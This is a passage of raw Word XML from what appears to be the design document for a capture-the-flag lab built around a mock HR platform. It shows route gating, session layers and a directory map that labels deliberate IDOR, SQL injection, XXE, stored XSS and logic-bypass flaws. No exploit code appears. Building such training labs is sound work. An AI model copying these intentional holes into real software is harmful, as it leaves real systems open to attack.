          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  |- /api/login, /api/resume, /api/progress, /api/exhibit-*, ...   -&gt; outer CTF game (unchanged)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  |- /api/peoplehub/*   -&gt; requires outer session with stage3=true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  |                        -&gt; lib/peoplehub/router.js (handle)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  |                             -&gt; requires PeopleHub's OWN session (phsid cookie)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  |                             -&gt; routes/*.js handlers, RBAC-checked (lib/peoplehub/rbac.js)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  |                             -&gt; lib/peoplehub/db.js (one persistent sqlite connection)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  |- /api/ctf-admin/*   -&gt; requires loopback connection only (no session of any kind)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  |                        -&gt; lib/peoplehub/router.js (handleAdmin)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  \- everything else (incl. all /peoplehub/*.html) -&gt; static file serving (public/)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Two completely independent session layers stack on top of each other:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Outer session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cookie, in-memory </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>server.js</w:t>
      </w:r>
      <w:r>
        <w:t>) — gates the whole game's progression (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>stage1</w:t>
      </w:r>
      <w:r>
        <w:t>…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>stage6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>solved1</w:t>
      </w:r>
      <w:r>
        <w:t>…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>solved6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). PeopleHub is unreachable at all without </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>stage3 = true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PeopleHub session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phsid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cookie, in-memory </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lib/peoplehub/session.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — a completely separate login, modeling "this browser is signed into the HR platform." Carries </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>userId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>employeeId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>roleId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>roleName</w:t>
      </w:r>
      <w:r>
        <w:t>. Knows nothing about challenge progress.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Challenge progress (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>challenge_state</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> table, in the PeopleHub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, not in either session object) is keyed by the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>outer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> session's token, specifically so a player can log out and back into PeopleHub — or even escalate from one PeopleHub account to another — without losing progress within the same outer-game run.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 Directory map</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>server.js                        outer game (~1000 lines) + PeopleHub mount points</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>lib/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  normalize.js, forensics.js,    outer game helpers (untouched)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  hrdb.js, xxe.js                outer game's Stage-4 XXE lab (untouched, still live)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  peoplehub/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    db.js                        persistent sqlite connection (open once, closeDb() for reseed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    session.js                   PeopleHub login sessions (phsid)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    rbac.js                      9-role capability matrix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    helpers.js                   requirePhAuth / fail / pagination shared by routes/*.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    challengeState.js            9-flag progress tracking, keyed by OUTER session token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    router.js                    dispatcher; also auth/dashboard/directory/profile/org/search/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">                                  meta/notifications handlers inline; handleAdmin for /ctf-admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    routes/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">      timepay.js                 Leave &amp; Attendance, Payroll</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">      documents.js                Documents (list safe, detail = IDOR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">      requests.js                 HR Requests (SQLi), IT Tickets (safe)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">      reports.js                   Reports (SQLi)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">      recruitment.js                Job Openings, Candidates, Applications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">      training.js                   Courses, Enrollments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">      comms.js                       Announcements, Policies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">      audit.js                        Audit Logs, Security Events</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">      admin.js                         Users, Roles, Departments, Import Jobs (Administration)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">      importxml.js                      Employee Data Import (XXE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">      feedback.js                        HR Feedback (stored XSS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">      emergency.js                        Emergency Access (business-logic bypass)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>seed/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  config.js                      SEED_* env-overridable data volumes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  data/                          names.js, org.js, catalog.js -- reference vocabularies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  lib/rng.js                     seeded PRNG (mulberry32) -- deterministic, not Math.random</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  generators/                    one file per domain; each populates its own table(s)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  seed.js                        orchestrator: wipes + rebuilds db/peoplehub.sqlite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>db/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  schema.sql                     25 tables, FKs, indexes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  peoplehub.sqlite                (generated, not committed logic -- rebuild with the seed script)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>challenge-data/                  XXE lab's synthetic filesystem (real files, read-only, on disk)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  hr/migration-notes.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
